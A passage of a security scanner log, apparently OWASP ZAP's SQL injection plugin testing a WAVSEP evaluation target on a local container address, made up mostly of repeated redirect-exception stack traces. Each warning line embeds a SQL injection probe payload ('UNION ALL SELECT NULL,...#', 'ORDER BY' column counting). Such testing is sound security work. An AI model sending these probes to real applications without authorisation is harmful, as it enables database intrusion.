org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680015 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680016 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680017 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680018 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680019 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680020 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680021 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680022 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680024 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680026 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 2787#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 2787# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680027 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680028 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at 